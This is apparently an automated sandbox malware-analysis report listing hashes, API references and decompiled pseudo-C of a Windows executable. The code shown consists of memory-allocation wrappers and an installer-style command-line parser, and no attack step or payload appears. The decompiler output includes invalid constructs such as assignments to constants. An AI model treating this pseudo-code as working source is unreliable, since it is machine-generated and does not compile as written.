                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: db3fdfdf1bd8ac4c22480c47d0930c8eaab142752635d7c5ae7eb8e7ff1096f3
                                                                      • Instruction ID: b15ec7c5c829275dd9083600374779230432e09ff152698a1f4bcbe5f0368469
                                                                      • Opcode Fuzzy Hash: db3fdfdf1bd8ac4c22480c47d0930c8eaab142752635d7c5ae7eb8e7ff1096f3
                                                                      • Instruction Fuzzy Hash: 5DB09276223440426E29463978295562841AAC123A7E45BA0F032C11D4CB3EC486D104
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D4CA0(long _a4) {
                                                                      				void* _t2;
                                                                      
                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                      				return _t2;
                                                                      			}




                                                                      0x011d4caa
                                                                      0x011d4cb1

                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 011D4CAA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: 544948d78c4bf57016b12d6726e7b828dd8686de67c7b21082b7489e07337a3c
                                                                      • Instruction ID: 4bb1b7b123835c3023252dc7f09b2eccadb966bfc6128274be8c8b596f63fe81
                                                                      • Opcode Fuzzy Hash: 544948d78c4bf57016b12d6726e7b828dd8686de67c7b21082b7489e07337a3c
                                                                      • Instruction Fuzzy Hash: FDB0123204520CB7CF102ED2F809F853F1DEFC4761F144010F61C46040CA7294508795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D4CC0(void* _a4) {
                                                                      				void* _t2;
                                                                      
                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                      				return _t2;
                                                                      			}




                                                                      0x011d4cc8
                                                                      0x011d4ccf

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      • Opcode ID: e2ba704279f28c1d8b44ee3b3e46869df4c50c50c5d3a7797452029309e89781
                                                                      • Instruction ID: 463781d2ca9cf5d2488738ad01ade735175d5b551dcc621f1fc50a33a733a660
                                                                      • Opcode Fuzzy Hash: e2ba704279f28c1d8b44ee3b3e46869df4c50c50c5d3a7797452029309e89781
                                                                      • Instruction Fuzzy Hash: 8FB0123100110CB78F102A52F8088453F1DDAC42607000020F51C42011CB3798518684
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E011D5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				CHAR* _v265;
                                                                      				char _v266;
                                                                      				char _v267;
                                                                      				char _v268;
                                                                      				CHAR* _v272;
                                                                      				char _v276;
                                                                      				signed int _v296;
                                                                      				char _v556;
                                                                      				signed int _t61;
                                                                      				int _t63;
                                                                      				char _t67;
                                                                      				CHAR* _t69;
                                                                      				signed int _t71;
                                                                      				void* _t75;
                                                                      				char _t79;
                                                                      				void* _t83;
                                                                      				void* _t85;
                                                                      				void* _t87;
                                                                      				intOrPtr _t88;
                                                                      				void* _t100;
                                                                      				intOrPtr _t101;
                                                                      				CHAR* _t104;
                                                                      				intOrPtr _t105;
                                                                      				void* _t111;
                                                                      				void* _t115;
                                                                      				CHAR* _t118;
                                                                      				void* _t119;
                                                                      				void* _t127;
                                                                      				CHAR* _t129;
                                                                      				void* _t132;
                                                                      				void* _t142;
                                                                      				signed int _t143;
                                                                      				CHAR* _t144;
                                                                      				void* _t145;
                                                                      				void* _t146;
                                                                      				void* _t147;
                                                                      				void* _t149;
                                                                      				char _t155;
                                                                      				void* _t157;
                                                                      				void* _t162;
                                                                      				void* _t163;
                                                                      				char _t167;
                                                                      				char _t170;
                                                                      				CHAR* _t173;
                                                                      				void* _t177;
                                                                      				intOrPtr* _t183;
                                                                      				intOrPtr* _t192;
                                                                      				CHAR* _t199;
                                                                      				void* _t200;
                                                                      				CHAR* _t201;
                                                                      				void* _t205;
                                                                      				void* _t206;
                                                                      				int _t209;
                                                                      				void* _t210;
                                                                      				void* _t212;
                                                                      				void* _t213;
                                                                      				CHAR* _t218;
                                                                      				intOrPtr* _t219;
                                                                      				intOrPtr* _t220;
                                                                      				signed int _t221;
                                                                      				signed int _t223;
                                                                      
                                                                      				_t173 = __ecx;
                                                                      				_t61 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t61 ^ _t221;
                                                                      				_push(__ebx);
                                                                      				_push(__esi);
                                                                      				_push(__edi);
                                                                      				_t209 = 1;
                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                      					_t63 = 1;
                                                                      				} else {
                                                                      					L2:
                                                                      					while(_t209 != 0) {
                                                                      						_t67 =  *_t173;
                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                      							_t173 = CharNextA(_t173);
                                                                      							continue;
                                                                      						}
                                                                      						_v272 = _t173;
                                                                      						if(_t67 == 0) {
                                                                      							break;
                                                                      						} else {
                                                                      							_t69 = _v272;
                                                                      							_t177 = 0;
                                                                      							_t213 = 0;
                                                                      							_t163 = 0;
                                                                      							_t202 = 1;
                                                                      							do {
                                                                      								if(_t213 != 0) {
                                                                      									if(_t163 != 0) {
                                                                      										break;
                                                                      									} else {
                                                                      										goto L21;
                                                                      									}
                                                                      								} else {
                                                                      									_t69 =  *_t69;
                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                      										break;
                                                                      									} else {
                                                                      										_t69 = _v272;
                                                                      										L21:
                                                                      										_t155 =  *_t69;
                                                                      										if(_t155 != 0x22) {
                                                                      											if(_t202 >= 0x104) {
                                                                      												goto L106;
                                                                      											} else {
                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                      												_t177 = _t177 + 1;
                                                                      												_t202 = _t202 + 1;
                                                                      												_t157 = 1;
                                                                      												goto L30;
                                                                      											}
                                                                      										} else {
                                                                      											if(_v272[1] == 0x22) {
                                                                      												if(_t202 >= 0x104) {
                                                                      													L106:
                                                                      													_t63 = 0;
                                                                      													L125:
                                                                      													_pop(_t210);
                                                                      													_pop(_t212);
                                                                      													_pop(_t162);
                                                                      													return E011D6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                      												} else {
                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                      													_t177 = _t177 + 1;
                                                                      													_t202 = _t202 + 1;
                                                                      													_t157 = 2;
                                                                      													goto L30;
                                                                      												}
                                                                      											} else {
                                                                      												_t157 = 1;
                                                                      												if(_t213 != 0) {
                                                                      													_t163 = 1;
                                                                      												} else {
                                                                      													_t213 = 1;
                                                                      												}
                                                                      												goto L30;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								goto L131;
                                                                      								L30:
                                                                      								_v272 =  &(_v272[_t157]);
                                                                      								_t69 = _v272;
                                                                      							} while ( *_t69 != 0);
                                                                      							if(_t177 >= 0x104) {
                                                                      								E011D6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                      								asm("int3");
                                                                      								_push(_t221);
                                                                      								_t222 = _t223;
                                                                      								_t71 =  *0x11d8004; // 0xdc3102d5
                                                                      								_v296 = _t71 ^ _t223;
                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                      									0x4f0 = 2;
                                                                      									_t75 = E011D597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                      								} else {
                                                                      									E011D44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                      									 *0x11d9124 = E011D6285();
                                                                      									_t75 = 0;
                                                                      								}
                                                                      								return E011D6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                      							} else {
                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                      								if(_t213 == 0) {
                                                                      									if(_t163 != 0) {
                                                                      										goto L34;
                                                                      									} else {
                                                                      										goto L40;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t163 != 0) {
                                                                      										L40:
                                                                      										_t79 = _v268;
                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                      											if(_t83 == 0) {
                                                                      												_t202 = 0x521;
                                                                      												E011D44B9(0, 0x521, 0x11d1140, 0, 0x40, 0);
                                                                      												_t85 =  *0x11d8588; // 0x0
                                                                      												if(_t85 != 0) {
                                                                      													CloseHandle(_t85);
                                                                      												}
                                                                      												ExitProcess(0);
                                                                      											}
                                                                      											_t87 = _t83 - 4;
                                                                      											if(_t87 == 0) {
                                                                      												if(_v266 != 0) {
                                                                      													if(_v266 != 0x3a) {
                                                                      														goto L49;
                                                                      													} else {
                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                      														_t215 =  &_v268 + _t167;
                                                                      														_t183 =  &_v268 + _t167;
                                                                      														_t50 = _t183 + 1; // 0x1
                                                                      														_t202 = _t50;
                                                                      														do {
                                                                      															_t88 =  *_t183;
                                                                      															_t183 = _t183 + 1;
                                                                      														} while (_t88 != 0);
                                                                      														if(_t183 == _t202) {
                                                                      															goto L49;
                                                                      														} else {
                                                                      															_t205 = 0x5b;
                                                                      															if(E011D667F(_t215, _t205) == 0) {
                                                                      																L115:
                                                                      																_t206 = 0x5d;
                                                                      																if(E011D667F(_t215, _t206) == 0) {
                                                                      																	L117:
                                                                      																	_t202 =  &_v276;
                                                                      																	_v276 = _t167;
                                                                      																	if(E011D5C17(_t215,  &_v276) == 0) {
                                                                      																		goto L49;
                                                                      																	} else {
                                                                      																		_t202 = 0x104;
                                                                      																		E011D1680(0x11d8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                      																	}
                                                                      																} else {
                                                                      																	_t202 = 0x5b;
                                                                      																	if(E011D667F(_t215, _t202) == 0) {
                                                                      																		goto L49;
                                                                      																	} else {
                                                                      																		goto L117;
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																_t202 = 0x5d;
                                                                      																if(E011D667F(_t215, _t202) == 0) {
                                                                      																	goto L49;
                                                                      																} else {
                                                                      																	goto L115;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													 *0x11d8a24 = 1;
                                                                      												}
                                                                      												goto L50;
                                                                      											} else {
                                                                      												_t100 = _t87 - 1;
                                                                      												if(_t100 == 0) {
                                                                      													L98:
                                                                      													if(_v266 != 0x3a) {
                                                                      														goto L49;
                                                                      													} else {
                                                                      														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                      														_t217 =  &_v268 + _t170;
                                                                      														_t192 =  &_v268 + _t170;
                                                                      														_t38 = _t192 + 1; // 0x1
                                                                      														_t202 = _t38;
                                                                      														do {
                                                                      															_t101 =  *_t192;
                                                                      															_t192 = _t192 + 1;
                                                                      														} while (_t101 != 0);
                                                                      														if(_t192 == _t202) {
                                                                      															goto L49;
                                                                      														} else {
                                                                      															_t202 =  &_v276;
                                                                      															_v276 = _t170;
                                                                      															if(E011D5C17(_t217,  &_v276) == 0) {
                                                                      																goto L49;
                                                                      															} else {
                                                                      																_t104 = CharUpperA(_v267);
                                                                      																_t218 = 0x11d8b3e;
                                                                      																_t105 = _v276;
                                                                      																if(_t104 != 0x54) {
                                                                      																	_t218 = 0x11d8a3a;
                                                                      																}
                                                                      																E011D1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                      																_t202 = 0x104;
                                                                      																E011D658A(_t218, 0x104, 0x11d1140);
                                                                      																if(E011D31E0(_t218) != 0) {
                                                                      																	goto L50;
                                                                      																} else {
                                                                      																	goto L106;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													_t111 = _t100 - 0xa;
                                                                      													if(_t111 == 0) {
                                                                      														if(_v266 != 0) {
                                                                      															if(_v266 != 0x3a) {
                                                                      																goto L49;
                                                                      															} else {
                                                                      																_t199 = _v265;
                                                                      																if(_t199 != 0) {
                                                                      																	_t219 =  &_v265;
                                                                      																	do {
                                                                      																		_t219 = _t219 + 1;
                                                                      																		_t115 = CharUpperA(_t199) - 0x45;
                                                                      																		if(_t115 == 0) {
                                                                      																			 *0x11d8a2c = 1;
                                                                      																		} else {
                                                                      																			_t200 = 2;
                                                                      																			_t119 = _t115 - _t200;
                                                                      																			if(_t119 == 0) {
                                                                      																				 *0x11d8a30 = 1;
                                                                      																			} else {
                                                                      																				if(_t119 == 0xf) {
                                                                      																					 *0x11d8a34 = 1;
                                                                      																				} else {
                                                                      																					_t209 = 0;
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																		_t118 =  *_t219;
                                                                      																		_t199 = _t118;
                                                                      																	} while (_t118 != 0);
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															 *0x11d8a2c = 1;
                                                                      														}
                                                                      														goto L50;
                                                                      													} else {
                                                                      														_t127 = _t111 - 3;
                                                                      														if(_t127 == 0) {
                                                                      															if(_v266 != 0) {
                                                                      																if(_v266 != 0x3a) {
                                                                      																	goto L49;
                                                                      																} else {
                                                                      																	_t129 = CharUpperA(_v265);
                                                                      																	if(_t129 == 0x31) {
                                                                      																		goto L76;
                                                                      																	} else {
                                                                      																		if(_t129 == 0x41) {
                                                                      																			goto L83;
                                                                      																		} else {
                                                                      																			if(_t129 == 0x55) {
                                                                      																				goto L76;
                                                                      																			} else {
                                                                      																				goto L49;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																L76:
                                                                      																_push(2);
                                                                      																_pop(1);
                                                                      																L83:
                                                                      																 *0x11d8a38 = 1;
                                                                      															}
                                                                      															goto L50;
                                                                      														} else {
                                                                      															_t132 = _t127 - 1;
                                                                      															if(_t132 == 0) {
                                                                      																if(_v266 != 0) {
                                                                      																	if(_v266 != 0x3a) {
                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                      																			goto L49;
                                                                      																		}
                                                                      																	} else {
                                                                      																		_t201 = _v265;
                                                                      																		 *0x11d9a2c = 1;
                                                                      																		if(_t201 != 0) {
                                                                      																			_t220 =  &_v265;
                                                                      																			do {
                                                                      																				_t220 = _t220 + 1;
                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                      																				if(_t142 == 0) {
                                                                      																					_t143 = 2;
                                                                      																					 *0x11d9a2c =  *0x11d9a2c | _t143;
                                                                      																					goto L70;
                                                                      																				} else {
                                                                      																					_t145 = _t142 - 3;
                                                                      																					if(_t145 == 0) {
                                                                      																						 *0x11d8d48 =  *0x11d8d48 | 0x00000040;
                                                                      																					} else {
                                                                      																						_t146 = _t145 - 5;
                                                                      																						if(_t146 == 0) {
                                                                      																							 *0x11d9a2c =  *0x11d9a2c & 0xfffffffd;
                                                                      																							goto L70;
                                                                      																						} else {
                                                                      																							_t147 = _t146 - 5;
                                                                      																							if(_t147 == 0) {
                                                                      																								 *0x11d9a2c =  *0x11d9a2c & 0xfffffffe;
                                                                      																								goto L70;
                                                                      																							} else {
                                                                      																								_t149 = _t147;
                                                                      																								if(_t149 == 0) {
                                                                      																									 *0x11d8d48 =  *0x11d8d48 | 0x00000080;
                                                                      																								} else {
                                                                      																									if(_t149 == 3) {
                                                                      																										 *0x11d9a2c =  *0x11d9a2c | 0x00000004;
                                                                      																										L70:
                                                                      																										 *0x11d8a28 = 1;
                                                                      																									} else {
                                                                      																										_t209 = 0;
                                                                      																									}
                                                                      																								}
                                                                      																							}
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																				_t144 =  *_t220;
                                                                      																				_t201 = _t144;
                                                                      																			} while (_t144 != 0);
                                                                      																		}
                                                                      																	}
                                                                      																} else {
                                                                      																	 *0x11d9a2c = 3;
                                                                      																	 *0x11d8a28 = 1;
                                                                      																}
                                                                      																goto L50;
                                                                      															} else {
                                                                      																if(_t132 == 0) {
                                                                      																	goto L98;
                                                                      																} else {
                                                                      																	L49:
                                                                      																	_t209 = 0;
                                                                      																	L50:
                                                                      																	_t173 = _v272;
                                                                      																	if( *_t173 != 0) {
                                                                      																		goto L2;
                                                                      																	} else {
                                                                      																		break;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											goto L106;
                                                                      										}
                                                                      									} else {
                                                                      										L34:
                                                                      										_t209 = 0;
                                                                      										break;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L131;
                                                                      					}
                                                                      					if( *0x11d8a2c != 0 &&  *0x11d8b3e == 0) {
                                                                      						if(GetModuleFileNameA( *0x11d9a3c, 0x11d8b3e, 0x104) == 0) {
                                                                      							_t209 = 0;
                                                                      						} else {
                                                                      							_t202 = 0x5c;
                                                                      							 *((char*)(E011D66C8(0x11d8b3e, _t202) + 1)) = 0;
                                                                      						}
                                                                      					}
                                                                      					_t63 = _t209;
                                                                      				}
                                                                      				L131:
                                                                      			}


































































                                                                      0x011d5c9e
                                                                      0x011d5ca9
                                                                      0x011d5cb0
                                                                      0x011d5cb3
                                                                      0x011d5cb6
                                                                      0x011d5cb7
                                                                      0x011d5cb8
                                                                      0x011d5cbd
                                                                      0x011d6204
                                                                      0x011d5ccb
                                                                      0x00000000
                                                                      0x011d5ccb
                                                                      0x011d5cd3
                                                                      0x011d5cd7
                                                                      0x011d5cf4
                                                                      0x00000000
                                                                      0x011d5cf4
                                                                      0x011d5cf8
                                                                      0x011d5d00
                                                                      0x00000000
                                                                      0x011d5d06
                                                                      0x011d5d06
                                                                      0x011d5d0e
                                                                      0x011d5d10
                                                                      0x011d5d12
                                                                      0x011d5d14
                                                                      0x011d5d15
                                                                      0x011d5d17
                                                                      0x011d5d49
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5d19
                                                                      0x011d5d19
                                                                      0x011d5d1d
                                                                      0x00000000
                                                                      0x011d5d3f
                                                                      0x011d5d3f
                                                                      0x011d5d4b
                                                                      0x011d5d4b
                                                                      0x011d5d4f
                                                                      0x011d5d8d
                                                                      0x00000000
                                                                      0x011d5d93
                                                                      0x011d5d93
                                                                      0x011d5d9a
                                                                      0x011d5d9d
                                                                      0x011d5d9e
                                                                      0x00000000
                                                                      0x011d5d9e
                                                                      0x011d5d51
                                                                      0x011d5d5b
                                                                      0x011d5d72
                                                                      0x011d60fb
                                                                      0x011d60fb
                                                                      0x011d6207
                                                                      0x011d620a
                                                                      0x011d620b
                                                                      0x011d620e
                                                                      0x011d6217
                                                                      0x011d5d78
                                                                      0x011d5d78
                                                                      0x011d5d80
                                                                      0x011d5d83
                                                                      0x011d5d84
                                                                      0x00000000
                                                                      0x011d5d84
                                                                      0x011d5d5d
                                                                      0x011d5d5f
                                                                      0x011d5d62
                                                                      0x011d5d68
                                                                      0x011d5d64
                                                                      0x011d5d64
                                                                      0x011d5d64
                                                                      0x00000000
                                                                      0x011d5d62
                                                                      0x011d5d5b
                                                                      0x011d5d4f
                                                                      0x011d5d1d
                                                                      0x00000000
                                                                      0x011d5d9f
                                                                      0x011d5d9f
                                                                      0x011d5da5
                                                                      0x011d5dab
                                                                      0x011d5dba
                                                                      0x011d6218
                                                                      0x011d621d
                                                                      0x011d6220
                                                                      0x011d6221
                                                                      0x011d6229
                                                                      0x011d6230
                                                                      0x011d6247
                                                                      0x011d626a
                                                                      0x011d6272
                                                                      0x011d6249
                                                                      0x011d6255
                                                                      0x011d625f
                                                                      0x011d6264
                                                                      0x011d6264
                                                                      0x011d6284
                                                                      0x011d5dc0
                                                                      0x011d5dc0
                                                                      0x011d5dca
                                                                      0x011d5e22
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5dcc
                                                                      0x011d5dce
                                                                      0x011d5e24
                                                                      0x011d5e24
                                                                      0x011d5e2c
                                                                      0x011d5e47
                                                                      0x011d5e4a
                                                                      0x011d61d2
                                                                      0x011d61e2
                                                                      0x011d61e7
                                                                      0x011d61ee
                                                                      0x011d61f1
                                                                      0x011d61f1
                                                                      0x011d61f8
                                                                      0x011d61f8
                                                                      0x011d5e50
                                                                      0x011d5e53
                                                                      0x011d6109
                                                                      0x011d611f
                                                                      0x00000000
                                                                      0x011d6125
                                                                      0x011d6137
                                                                      0x011d613a
                                                                      0x011d613c
                                                                      0x011d613e
                                                                      0x011d613e
                                                                      0x011d6141
                                                                      0x011d6141
                                                                      0x011d6143
                                                                      0x011d6144
                                                                      0x011d614a
                                                                      0x00000000
                                                                      0x011d6150
                                                                      0x011d6152
                                                                      0x011d615c
                                                                      0x011d6170
                                                                      0x011d6172
                                                                      0x011d617c
                                                                      0x011d6190
                                                                      0x011d6190
                                                                      0x011d6196
                                                                      0x011d61a5
                                                                      0x00000000
                                                                      0x011d61ab
                                                                      0x011d61b9
                                                                      0x011d61c6
                                                                      0x011d61c6
                                                                      0x011d617e
                                                                      0x011d6180
                                                                      0x011d618a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d618a
                                                                      0x011d615e
                                                                      0x011d6160
                                                                      0x011d616a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d616a
                                                                      0x011d615c
                                                                      0x011d614a
                                                                      0x011d610b
                                                                      0x011d610e
                                                                      0x011d610e
                                                                      0x00000000
                                                                      0x011d5e59
                                                                      0x011d5e59
                                                                      0x011d5e5c
                                                                      0x011d604f
                                                                      0x011d6056
                                                                      0x00000000
                                                                      0x011d605c
                                                                      0x011d606e
                                                                      0x011d6071
                                                                      0x011d6073
                                                                      0x011d6075
                                                                      0x011d6075
                                                                      0x011d6078
                                                                      0x011d6078
                                                                      0x011d607a
                                                                      0x011d607b
                                                                      0x011d6081
                                                                      0x00000000
                                                                      0x011d6087
                                                                      0x011d6087
                                                                      0x011d608d
                                                                      0x011d609c
                                                                      0x00000000
                                                                      0x011d60a2
                                                                      0x011d60aa
                                                                      0x011d60b2
                                                                      0x011d60b7
                                                                      0x011d60bd
                                                                      0x011d60bf
                                                                      0x011d60bf
                                                                      0x011d60d6
                                                                      0x011d60e0
                                                                      0x011d60e7
                                                                      0x011d60f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d60f5
                                                                      0x011d609c
                                                                      0x011d6081
                                                                      0x011d5e62
                                                                      0x011d5e62
                                                                      0x011d5e65
                                                                      0x011d5fd3
                                                                      0x011d5fe9
                                                                      0x00000000
                                                                      0x011d5fef
                                                                      0x011d5fef
                                                                      0x011d5ff7
                                                                      0x011d5ffd
                                                                      0x011d6003
                                                                      0x011d6006
                                                                      0x011d6011
                                                                      0x011d6014
                                                                      0x011d603d
                                                                      0x011d6016
                                                                      0x011d6018
                                                                      0x011d6019
                                                                      0x011d601b
                                                                      0x011d6033
                                                                      0x011d601d
                                                                      0x011d6020
                                                                      0x011d6029
                                                                      0x011d6022
                                                                      0x011d6022
                                                                      0x011d6022
                                                                      0x011d6020
                                                                      0x011d601b
                                                                      0x011d6042
                                                                      0x011d6044
                                                                      0x011d6046
                                                                      0x011d604a
                                                                      0x011d5ff7
                                                                      0x011d5fd5
                                                                      0x011d5fd8
                                                                      0x011d5fd8
                                                                      0x00000000
                                                                      0x011d5e6b
                                                                      0x011d5e6b
                                                                      0x011d5e6e
                                                                      0x011d5f8b
                                                                      0x011d5f99
                                                                      0x00000000
                                                                      0x011d5f9f
                                                                      0x011d5fa7
                                                                      0x011d5faf
                                                                      0x00000000
                                                                      0x011d5fb1
                                                                      0x011d5fb3
                                                                      0x00000000
                                                                      0x011d5fb5
                                                                      0x011d5fb7
                                                                      0x00000000
                                                                      0x011d5fb9
                                                                      0x00000000
                                                                      0x011d5fb9
                                                                      0x011d5fb7
                                                                      0x011d5fb3
                                                                      0x011d5faf
                                                                      0x011d5f8d
                                                                      0x011d5f8d
                                                                      0x011d5f8d
                                                                      0x011d5f8f
                                                                      0x011d5fc1
                                                                      0x011d5fc1
                                                                      0x011d5fc1
                                                                      0x00000000
                                                                      0x011d5e74
                                                                      0x011d5e74
                                                                      0x011d5e77
                                                                      0x011d5ea0
                                                                      0x011d5ebd
                                                                      0x011d5f79
                                                                      0x00000000
                                                                      0x011d5f7f
                                                                      0x011d5ec3
                                                                      0x011d5ec3
                                                                      0x011d5ecc
                                                                      0x011d5ed4
                                                                      0x011d5ed6
                                                                      0x011d5edc
                                                                      0x011d5edf
                                                                      0x011d5eea
                                                                      0x011d5eed
                                                                      0x011d5f3f
                                                                      0x011d5f40
                                                                      0x00000000
                                                                      0x011d5eef
                                                                      0x011d5eef
                                                                      0x011d5ef2
                                                                      0x011d5f34
                                                                      0x011d5ef4
                                                                      0x011d5ef4
                                                                      0x011d5ef7
                                                                      0x011d5f2b
                                                                      0x00000000
                                                                      0x011d5ef9
                                                                      0x011d5ef9
                                                                      0x011d5efc
                                                                      0x011d5f22
                                                                      0x00000000
                                                                      0x011d5efe
                                                                      0x011d5eff
                                                                      0x011d5f02
                                                                      0x011d5f16
                                                                      0x011d5f04
                                                                      0x011d5f07
                                                                      0x011d5f0d
                                                                      0x011d5f46
                                                                      0x011d5f46
                                                                      0x011d5f09
                                                                      0x011d5f09
                                                                      0x011d5f09
                                                                      0x011d5f07
                                                                      0x011d5f02
                                                                      0x011d5efc
                                                                      0x011d5ef7
                                                                      0x011d5ef2
                                                                      0x011d5f4c
                                                                      0x011d5f4e
                                                                      0x011d5f50
                                                                      0x011d5f54
                                                                      0x011d5ed4
                                                                      0x011d5ea2
                                                                      0x011d5ea4
                                                                      0x011d5eaf
                                                                      0x011d5eaf
                                                                      0x00000000
                                                                      0x011d5e79
                                                                      0x011d5e7d
                                                                      0x00000000
                                                                      0x011d5e83
                                                                      0x011d5e83
                                                                      0x011d5e83
                                                                      0x011d5e85
                                                                      0x011d5e85
                                                                      0x011d5e8e
                                                                      0x00000000
                                                                      0x011d5e94
                                                                      0x00000000
                                                                      0x011d5e94
                                                                      0x011d5e8e
                                                                      0x011d5e7d
                                                                      0x011d5e77
                                                                      0x011d5e6e
                                                                      0x011d5e65
                                                                      0x011d5e5c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5dd0
                                                                      0x011d5dd0
                                                                      0x011d5dd0
                                                                      0x00000000
                                                                      0x011d5dd0
                                                                      0x011d5dce
                                                                      0x011d5dca
                                                                      0x011d5dba
                                                                      0x00000000
                                                                      0x011d5d00
                                                                      0x011d5dd9
                                                                      0x011d5e04
                                                                      0x011d61fe
                                                                      0x011d5e0a
                                                                      0x011d5e0c
                                                                      0x011d5e17
                                                                      0x011d5e17
                                                                      0x011d5e04
                                                                      0x011d6200
                                                                      0x011d6200
                                                                      0x00000000

                                                                      APIs
                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 011D5CEE
                                                                      • GetModuleFileNameA.KERNEL32(011D8B3E,00000104,00000000,?,?), ref: 011D5DFC
                                                                      • CharUpperA.USER32(?), ref: 011D5E3E
                                                                      • CharUpperA.USER32(-00000052), ref: 011D5EE1
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 011D5F6F
                                                                      • CharUpperA.USER32(?), ref: 011D5FA7
                                                                      • CharUpperA.USER32(-0000004E), ref: 011D6008
                                                                      • CharUpperA.USER32(?), ref: 011D60AA
                                                                      • CloseHandle.KERNEL32(00000000,011D1140,00000000,00000040,00000000), ref: 011D61F1
                                                                      • ExitProcess.KERNEL32 ref: 011D61F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
